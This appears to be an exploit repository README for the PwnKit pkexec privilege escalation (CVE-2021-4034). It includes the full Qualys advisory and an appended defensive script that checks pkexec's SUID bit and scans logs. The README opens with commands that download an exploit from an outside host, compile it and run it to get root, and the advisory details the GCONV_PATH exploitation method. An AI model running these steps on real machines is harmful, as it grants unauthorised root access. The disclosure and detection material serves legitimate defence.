🐧 MAJOR BUG GRANTS ROOT FOR ALL MAJOR LINUX DISTRIBUTIONS

CTF quality exploit

bla bla irresponsible disclosure

terminal:

[email protected]:~$ wget https://g1f1.github.io/blasty-vs-pkexec.c/blasty-vs-pkexec.c
[email protected]:~$ gcc -o blasty blasty-vs-pkexec.c
[email protected]:~$ ./blasty
[~] compile helper..
[~] maybe get shell now?
# whoami
root

exploitation when debugging:

pkexec must be setuid root
Owner
George Filippas
Comments
  • pwnkit: Local Privilege Escalation in polkit's pkexec (CVE-2021-4034)

    Qualys Security Advisory

    pwnkit: Local Privilege Escalation in polkit's pkexec (CVE-2021-4034)

    Contents

    Summary
    Analysis
    Exploitation
    Acknowledgments
    Timeline

    Summary

    We discovered a Local Privilege Escalation (from any user to root) in polkit's pkexec, a SUID-root program that is installed by default on every major Linux distribution:

    "Polkit (formerly PolicyKit) is a component for controlling system-wide privileges in Unix-like operating systems. It provides an organized way for non-privileged processes to communicate with privileged ones. [...] It is also possible to use polkit to execute commands with elevated privileges using the command pkexec followed by the command intended to be executed (with root permission)." (Wikipedia)

    This vulnerability is an attacker's dream come true:

    • pkexec is installed by default on all major Linux distributions (we exploited Ubuntu, Debian, Fedora, CentOS, and other distributions are probably also exploitable);

    • pkexec is vulnerable since its creation, in May 2009 (commit c8c3d83, "Add a pkexec(1) command");

    • any unprivileged local user can exploit this vulnerability to obtain full root privileges;

    • although this vulnerability is technically a memory corruption, it is exploitable instantly, reliably, in an architecture-independent way;

    • and it is exploitable even if the polkit daemon itself is not running.

    We will not publish our exploit immediately; however, please note that this vulnerability is trivially exploitable, and other researchers might publish their exploits shortly after the patches are available. If no patches are available for your operating system, you can remove the SUID-bit from pkexec as a temporary mitigation; for example:

    chmod 0755 /usr/bin/pkexec

    This vulnerability is one of our most beautiful discoveries; to honor its memory, we recommend listening to DJ Pone's "Falken's Maze" (double pun intended) while reading this advisory. Thank you very much!

    Analysis

    pkexec is a sudo-like, SUID-root program, described as follows by its man page:

    NAME
        pkexec - Execute a command as another user

    SYNOPSIS
        pkexec [--version] [--disable-internal-agent] [--help]

        pkexec [--user username] PROGRAM [ARGUMENTS...]

    DESCRIPTION
        pkexec allows an authorized user to execute PROGRAM as another user. If PROGRAM is not specified, the default shell will be run. If username is not specified, then the program will be executed as the administrative super user, root.

    The beginning of pkexec's main() function processes the command-line arguments (lines 534-568), and searches for the program to be executed (if its path is not absolute) in the directories of the PATH environment variable (lines 610-640):

    435 main (int argc, char *argv[])
    436 {
    ...
    534   for (n = 1; n < (guint) argc; n++)
    535     {
    ...
    568     }
    ...
    610   path = g_strdup (argv[n]);
    ...
    629   if (path[0] != '/')
    630     {
    ...
    632       s = g_find_program_in_path (path);
    ...
    639       argv[n] = path = s;
    640     }

    Unfortunately, if the number of command-line arguments argc is 0 (if the argument list argv that we pass to execve() is empty, i.e. {NULL}), then argv[0] is NULL (the argument list's terminator) and:

    • at line 534, the integer n is permanently set to 1;

    • at line 610, the pointer path is read out-of-bounds from argv[1];

    • at line 639, the pointer s is written out-of-bounds to argv[1].

    But what exactly is read from and written to this out-of-bounds argv[1]? To answer this question, we must digress briefly. When we execve() a new program, the kernel copies our argument and environment strings and pointers (argv and envp) to the end of the new program's stack; for example:

    | argv[0]   | argv[1]   | argv[argc] | envp[0] | envp[1]     | envp[envc] |
    |:---------:|:---------:|:----------:|:-------:|:-----------:|:----------:|
    | "program" | "-option" | NULL       | "value" | "PATH=name" | NULL       |

    Clearly (because the argv and envp pointers are contiguous in memory), if argc is 0, then the out-of-bounds argv[1] is actually envp[0], the pointer to our first environment variable, "value". Consequently:

    • at line 610, the path of the program to be executed is read out-of-bounds from argv[1] (i.e. envp[0]), and points to "value";

    • at line 632, this path "value" is passed to g_find_program_in_path() (because "value" does not start with a slash, at line 629);

    • g_find_program_in_path() searches for an executable file named "value" in the directories of our PATH environment variable;

    • if such an executable file is found, its full path is returned to pkexec's main() function (at line 632);

    • and at line 639, this full path is written out-of-bounds to argv[1] (i.e. envp[0]), thus overwriting our first environment variable.

    More precisely:

    • if our PATH environment variable is "PATH=name", and if the directory "name" exists (in the current working directory) and contains an executable file named "value", then a pointer to the string "name/value" is written out-of-bounds to envp[0];

    • or, if our PATH is "PATH=name=.", and if the directory "name=." exists and contains an executable file named "value", then a pointer to the string "name=./value" is written out-of-bounds to envp[0].

    In other words, this out-of-bounds write allows us to re-introduce an "unsecure" environment variable (for example, LD_PRELOAD) into pkexec's environment; these "unsecure" variables are normally removed (by ld.so) from the environment of SUID programs before the main() function is called. We will exploit this powerful primitive in the following section.

    Last-minute note: polkit also supports non-Linux operating systems such as Solaris and *BSD, but we have not investigated their exploitability; however, we note that OpenBSD is not exploitable, because its kernel refuses to execve() a program if argc is 0.

    Exploitation

    Our question is: to successfully exploit this vulnerability, which "unsecure" variable should we re-introduce into pkexec's environment? Our options are limited, because shortly after the out-of-bounds write (at line 639), pkexec completely clears its environment (at line 702):

    639       argv[n] = path = s;
    ...
    657   for (n = 0; environment_variables_to_save[n] != NULL; n++)
    658     {
    659       const gchar *key = environment_variables_to_save[n];
    ...
    662       value = g_getenv (key);
    ...
    670       if (!validate_environment_variable (key, value))
    ...
    675     }
    ...
    702   if (clearenv () != 0)

    The answer to our question comes from pkexec's complexity: to print an error message to stderr, pkexec calls the GLib's function g_printerr() (note: the GLib is a GNOME library, not the GNU C Library, aka glibc); for example, the functions validate_environment_variable() and log_message() call g_printerr() (at lines 126 and 408-409):

     88 log_message (gint     level,
     89              gboolean print_to_stderr,
     90              const    gchar *format,
     91              ...)
     92 {
    ...
    125   if (print_to_stderr)
    126     g_printerr ("%s\n", s);

    383 validate_environment_variable (const gchar *key,
    384                                const gchar *value)
    385 {
    ...
    406       log_message (LOG_CRIT, TRUE,
    407                    "The value for the SHELL variable was not found the /etc/shells file");
    408       g_printerr ("\n"
    409                   "This incident has been reported.\n");

    g_printerr() normally prints UTF-8 error messages, but it can print messages in another charset if the environment variable CHARSET is not UTF-8 (note: CHARSET is not security sensitive, it is not an "unsecure" environment variable). To convert messages from UTF-8 to another charset, g_printerr() calls the glibc's function iconv_open().

    To convert messages from one charset to another, iconv_open() executes small shared libraries; normally, these triplets ("from" charset, "to" charset, and library name) are read from a default configuration file, /usr/lib/gconv/gconv-modules. Alternatively, the environment variable GCONV_PATH can force iconv_open() to read another configuration file; naturally, GCONV_PATH is one of the "unsecure" environment variables (because it leads to the execution of arbitrary libraries), and is therefore removed by ld.so from the environment of SUID programs.

    Unfortunately, CVE-2021-4034 allows us to re-introduce GCONV_PATH into pkexec's environment, and to execute our own shared library, as root.

    Important: this exploitation technique leaves traces in the logs (either "The value for the SHELL variable was not found the /etc/shells file" or "The value for environment variable [...] contains suscipious content"). However, please note that this vulnerability is also exploitable without leaving any traces in the logs, but this is left as an exercise for the interested reader.

    For further discussions about pkexec, GLib, and GCONV_PATH, please refer to the following posts by Tavis Ormandy, Jakub Wilk, and Yuki Koike:

    https://www.openwall.com/lists/oss-security/2014/07/14/1
    https://www.openwall.com/lists/oss-security/2017/06/23/8
    https://hugeh0ge.github.io/2019/11/04/Getting-Arbitrary-Code-Execution-from-fopen-s-2nd-Argument/

    Acknowledgments

    We thank polkit's authors, Red Hat Product Security, and the members of [email protected] for their invaluable help with the disclosure of this vulnerability. We also thank Birdy Nam Nam for their inspiring work.

    Timeline

    2021-11-18: Advisory sent to [email protected]

    2022-01-11: Advisory and patch sent to [email protected]

    2022-01-25: Coordinated Release Date (5:00 PM UTC).
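The following shell script is an added example; it is not code from blasty's repository nor from the Qualys advisory quoted above. It covers two defender-side actions the advisory describes: the Summary's temporary mitigation (check whether pkexec still carries the SUID-root bit, and drop it with `chmod 0755`), and the Exploitation section's note that this technique leaves two specific messages in the logs (a scan for those messages over a log file). The log lines built by `make_sample_log` are constructed, and the syslog-style line prefix in them is an assumption; the function and variable names are mine.

```shell
#!/bin/sh
# Added example (not part of blasty's repository or the Qualys advisory):
# a defender-side audit for CVE-2021-4034 exposure.
#  1. pkexec_suid_state / pkexec_remove_suid: is pkexec SUID-root, and apply
#     the advisory's temporary mitigation (chmod 0755).
#  2. pwnkit_trace_count / pwnkit_trace_lines: scan a log file for the two
#     messages the advisory says the GCONV_PATH technique leaves behind.
# Assumes a POSIX sh with find, grep, chmod and mktemp.

# Report the SUID state of one file. Prints exactly one word:
#   setuid-root   SUID bit set and owned by uid 0 (the vulnerable configuration)
#   setuid-other  SUID bit set but not owned by root
#   no-setuid     SUID bit clear (the advisory's mitigated state)
#   missing       file does not exist
pkexec_suid_state() {
    f="${1:-/usr/bin/pkexec}"
    if [ ! -e "$f" ]; then
        echo missing
        return 0
    fi
    if [ -u "$f" ]; then
        # -prune keeps find on the file itself; -user root filters by owner.
        if [ -n "$(find "$f" -prune -user root 2>/dev/null)" ]; then
            echo setuid-root
        else
            echo setuid-other
        fi
    else
        echo no-setuid
    fi
}

# Apply the advisory's temporary mitigation (drop the SUID bit) and print the
# resulting state. On a real system this needs root.
pkexec_remove_suid() {
    f="${1:-/usr/bin/pkexec}"
    chmod 0755 "$f"
    pkexec_suid_state "$f"
}

# Both log strings quoted in the advisory. "suscipious" is spelled the way
# pkexec spells it, so the pattern keeps the typo. The advisory elides the
# variable name with [...]; ".*" stands in for it here (an assumption).
PWNKIT_TRACE_RE='The value for the SHELL variable was not found the /etc/shells file|The value for environment variable .* contains suscipious content'

# Count lines in a log file that match either trace message.
pwnkit_trace_count() {
    # grep -c exits 1 when the count is 0; the count is still printed.
    grep -c -E "$PWNKIT_TRACE_RE" "$1" || true
}

# Print the matching lines for triage (nothing if there are none).
pwnkit_trace_lines() {
    grep -E "$PWNKIT_TRACE_RE" "$1" || true
}

# Constructed sample log (not a real capture) with two trace lines and two
# unrelated lines, written to a temp file whose path is printed.
make_sample_log() {
    out="${1:-$(mktemp)}"
    cat > "$out" <<'EOF'
Jan 25 17:03:11 host pkexec[4242]: The value for the SHELL variable was not found the /etc/shells file
Jan 25 17:03:11 host pkexec[4242]: The value for environment variable XAUTHORITY contains suscipious content
Jan 25 17:04:02 host sshd[4300]: Accepted publickey for alice from 192.0.2.10 port 50322
Jan 25 17:05:40 host pkexec[4401]: alice: Executing command [USER=root] [COMMAND=/usr/bin/id]
EOF
    echo "$out"
}

# Stand-alone run: audit the local pkexec and scan the constructed sample.
echo "pkexec state: $(pkexec_suid_state /usr/bin/pkexec)"
sample=$(make_sample_log)
echo "trace lines in sample: $(pwnkit_trace_count "$sample")"
pwnkit_trace_lines "$sample"
rm -f "$sample"
```

Run it as-is to see the state of the local pkexec and the two hits in the constructed sample; point `pwnkit_trace_count` at `/var/log/auth.log` or at `journalctl -o short` output redirected to a file to scan real logs. Only the `setuid-root` state matters for this bug; `pkexec_remove_suid` is the stop-gap until a patched polkit is installed, and removing the bit also breaks legitimate pkexec use, which is why the advisory calls it temporary.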
